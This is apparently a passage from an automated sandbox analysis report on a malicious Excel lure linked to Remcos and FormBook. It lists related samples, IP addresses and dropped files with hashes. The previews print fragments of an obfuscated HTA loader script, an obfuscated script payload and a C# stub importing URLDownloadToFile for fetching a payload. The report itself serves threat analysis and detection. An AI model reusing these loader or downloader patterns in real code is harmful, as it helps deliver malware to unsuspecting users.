                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      350.xlsGet hashmaliciousFormBookBrowse
                                                      • 207.241.232.154
                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      7dcce5b76c8b17472d024758970a406bRFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 88.99.66.38
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 88.99.66.38
                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      350.xlsGet hashmaliciousFormBookBrowse
                                                      • 88.99.66.38
                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      Inv 30532.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):15189
                                                      Entropy (8bit):5.0343247648743
                                                      Encrypted:false
                                                      SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                      MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                      SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                      SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                      SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkroundthings[1].hta

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):117939
                                                      Entropy (8bit):2.172108685772815
                                                      Encrypted:false
                                                      SSDEEP:48:7oa+apd7Ah23jlGNlhs+iKW+sRiMHsgSb799Dd7nAZbVUdZdbR8oq+Ajb5LhxmsU:Ea+M7kNcLHRgga7flnOaw5AT
                                                      MD5:82E8D7775023BF6AC1427CF1B766F2EF
                                                      SHA1:DC0434C418831753A94CDB7B6F40F65BAA3F657E
                                                      SHA-256:93E15BB8B41CA4DDD2F3D5A092C05BE2627AE9EE11E66ED1D4FED4E634C19418
                                                      SHA-512:4C184C78897D32A18C94EF2E546E3256A21380E4F54BB737AB8D5D085C859D302B2220E2669C3EA52A65D6F8F89EB98EC3B77589CDE805C9F41FF0F9DC945400
                                                      Malicious:true
                                                      Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCript%252520type%25253D%252522TExT/VBSCrIpt%252522%25253E%25250Adim%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wecreatedbuttersmoothbutterthings[1].tiff

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):182074
                                                      Entropy (8bit):3.839212582497392
                                                      Encrypted:false
                                                      SSDEEP:3072:hGhbpF6rvZuVP8rpnVoipBqWxpgt5pfGwLU40y7ND3/Mua+LhrNkY:whKrvcVUrJVocBFSUAD30j+L9+Y
                                                      MD5:825926FCCB7DEBB08441E8DCD4963411
                                                      SHA1:D6299F30A8C04F8AAC1650F118443756E4EFFD4A
                                                      SHA-256:28185883247F149D31E10069DE858A3B3C7026E57D4C0D7DCAE1D87204D4573D
                                                      SHA-512:0BBFA440423715751AC5DFCAD1094058C469496C603B3358CD07BC725BCBF340BEB69D5B4676C0BE100E3E1BB231952D85989413A283C3B03613C09B96F1DBFF
                                                      Malicious:false
                                                      Preview:......P.C.A.z.b.L.L.P.z.i. .=. .".j.e.i.G.W.R.W.o.K.c.".....t.c.H.c.Z.k.t.B.W.R. .=. .".K.W.e.x.z.A.G.c.L.r.".....W.W.W.T.S.i.S.P.q.i. .=. .".p.s.n.i.Z.c.a.K.i.A.".....e.B.m.j.Z.B.r.H.k.W. .=. .".B.c.o.k.Z.t.B.W.R.t.".....b.p.A.L.Z.B.G.C.c.p. .=. .".o.W.W.Z.k.G.d.K.p.T.".....L.Z.A.L.u.i.H.x.p.G. .=. .".W.C.h.p.L.W.K.a.W.G.".....L.p.S.I.z.k.O.d.L.t. .=. .".W.Z.K.A.U.i.d.U.K.b.".........A.N.c.H.i.U.G.n.P.p. .=. .".d.U.e.Q.e.c.P.b.L.N.".....Q.N.K.G.h.C.O.t.K.H. .=. .".t.n.e.A.L.Q.f.K.G.u.".....s.L.i.r.z.L.b.Z.m.h. .=. .".L.H.f.N.f.p.c.q.i.n.".....K.Z.u.K.m.c.L.m.j.W. .=. .".i.f.P.Z.u.l.u.W.R.k.".....z.q.m.A.K.G.t.m.h.m. .=. .".z.n.z.d.W.k.l.L.L.d.".....L.B.m.O.x.f.f.B.c.L. .=. .".C.i.x.S.f.v.W.k.b.s.".....G.t.U.n.o.L.O.h.c.i. .=. .".n.S.J.W.Z.f.v.d.x.T.".....G.L.t.L.W.R.J.K.A.K. .=. .".i.W.P.A.I.t.b.c.W.u.".....k.N.U.U.G.N.p.b.o.Q. .=. .".m.L.k.U.L.N.N.A.L.b.".....c.L.i.b.Q.G.Z.L.Q.K. .=. .".O.c.R.c.z.B.P.C.T.n.".........h.W.H.s.d.H.g.p.t.e. .=. .".u.U.e.i.R.R.R.W.u.d.".....O.u.f.c.L.H.o.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):962
                                                      Entropy (8bit):5.013811273052389
                                                      Encrypted:false
                                                      SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                      MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                      SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                      SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                      SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                      Malicious:false
                                                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DD0935E.emf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):4527404
                                                      Entropy (8bit):3.8573411297737294
                                                      Encrypted:false
                                                      SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                      MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                      SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                      SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                      SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                      Malicious:false
                                                      Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B73744D0.emf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):4527404
                                                      Entropy (8bit):3.8573411297737294
                                                      Encrypted:false
                                                      SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                      MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                      SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                      SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                      SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                      Malicious:false
                                                      Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

                                                      C:\Users\user\AppData\Local\Temp\04v4keoo.wzz.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\4vhnhywg.tnp.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\5dmchq4k.l3o.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\RES89F7.tmp

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 04:56:34 2024, 1st section name ".debug$S"
                                                      Category:dropped
                                                      Size (bytes):1328
                                                      Entropy (8bit):3.9881338082024675
                                                      Encrypted:false
                                                      SSDEEP:24:HIe9Eurl3sGxNdHdjwKdNWI+ycuZhNTakSFPNnqSqd:Vr1sGR90Kd41ulTa3fqSK
                                                      MD5:3F81460419ECEEFB92883AE4BCA861D2
                                                      SHA1:5623A058AE07D94D66B5B134F76C27288B72ADE5
                                                      SHA-256:B4D2C89C90F8BBA98E6948AB7BA390E0FCCDC9FBE145DFE28B0F63050E5934C1
                                                      SHA-512:245FF1802BF0BB73DFA61592A045AC662841BF47F853114DFCAD23426B84B0630D7A13EF5FDD9BDC8FB4312736A3C71CC267DF35A3463FA31437901AE7B3FB4D
                                                      Malicious:false
                                                      Preview:L......f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP................S#5..:.C..F..............4.......C:\Users\user\AppData\Local\Temp\RES89F7.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.m.l.w.l.g.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                      C:\Users\user\AppData\Local\Temp\RESCDF9.tmp

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 04:56:52 2024, 1st section name ".debug$S"
                                                      Category:dropped
                                                      Size (bytes):1328
                                                      Entropy (8bit):3.9948369603086493
                                                      Encrypted:false
                                                      SSDEEP:24:Hue9EurT0dH/wKdNWI+ycuZhNCakSqPNnqSqd:brTEoKd41ulCa3GqSK
                                                      MD5:6A7E4282A14ACFF320562AEBF3F41633
                                                      SHA1:F44FE75ACCCDED48DA906F6945A0B4789B1F008D
                                                      SHA-256:3BDD3DF1049E446644FBDA6F0950947752418AF310EFC0E043431B13FCD6E3AA
                                                      SHA-512:A2794D1131CA1B5F3C09B36AC3ADAF4AEC79C61BD7C74FB63F71908C30E690E9A47A1B2B90B0B63418759AC910DDB86DA39C825A7AED9B9D57C6E95808ABA567
                                                      Malicious:false
                                                      Preview:L......f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP..................W......Q.?..............4.......C:\Users\user\AppData\Local\Temp\RESCDF9.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.j.o.4.t.j.0.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                      C:\Users\user\AppData\Local\Temp\a5lgtqgr.t5c.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\ajfkpe3p.xs0.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\asv5z5h3.skq.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\cjekjvlv.cge.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\h4uk5yx3.or4.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
                                                      Entropy (8bit):3.0846299424073904
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryc+ak7YnqqlfPN5Dlq5J:+RI+ycuZhNTakSFPNnqX
                                                      MD5:532335CB0D3AE243DDD5469DE9CF97DC
                                                      SHA1:70E2D6FC951DE91C444459FF4D64B2047DAB8530
                                                      SHA-256:0F7EFAB2590701395652045EA59F3FF7E4B4011C3263A0E0AA11263B88A7A643
                                                      SHA-512:B33C2269117B23C761495CB5973FB6CDBA0FB06F70A6C115614CCBF1B3DC06D74999CA2678273032C278506FD173E603D15A9504F1F4C9EB152911A6C0056053
                                                      Malicious:false
                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.m.l.w.l.g.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.m.l.w.l.g.j.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                      C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.0.cs

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
                                                      Category:dropped
                                                      Size (bytes):469
                                                      Entropy (8bit):3.9168776922580797
                                                      Encrypted:false
                                                      SSDEEP:6:V/DsYLDS81zun8cqZNVMm7tQXReKJ8SRHy4HmvmKlW0Dbme2Oi1mYy:V/DTLDfuGZeXfHav3DuOvYy
                                                      MD5:F347D2095BBABC6430C3479994132BB6
                                                      SHA1:DA6356149A945F87B97115EB29A0A6B665A4862C
                                                      SHA-256:053B79EC2FB6EB79BFC39B418EF150F58F21132501130910976F79C4B99AD5BC
                                                      SHA-512:57DA6A9EF5099DA3A8041BA16B3161A3669FC49F1B95C89C2096B946F926A7516CF1041D2481B7E36D7F874AE02F72F13F4BA2573710B96C184CD2D4629D6630
                                                      Malicious:false
                                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace MAg.{. public class vQwQONIjUcm. {. [DllImport("UrLMOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr vE,string tbBn,string zCrVCZth,uint jKFGSfwvaiR,IntPtr MnTOq);.. }..}.

                                                      C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):369
                                                      Entropy (8bit):5.2210658734165545
                                                      Encrypted:false
                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23ft3n0SOHzxs7+AEszIP23ft3n0SOC:p37Lvkmb6Kzl3nrOHWZEol3nrOC
                                                      MD5:80B8997633B42D6DD4B172F16510C0EE
                                                      SHA1:986CED6F2E8FF55E3A5734696AB0E995E8DB2CB8
                                                      SHA-256:69D5C5C5774469B21B103073398A0593FD8B335AA0CEEC1CE4024DEF5F4F2044
                                                      SHA-512:C26118C487BF04C858735B7619B798FB31A48B34861869D4F4F1607A4CDE0215F87C3054A8DE564450C1603E0AE4D9E5D4CE53748034BE124462B8635C93DFF5
                                                      Malicious:true
                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.0.cs"

                                                      C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dll

                                                      Download File
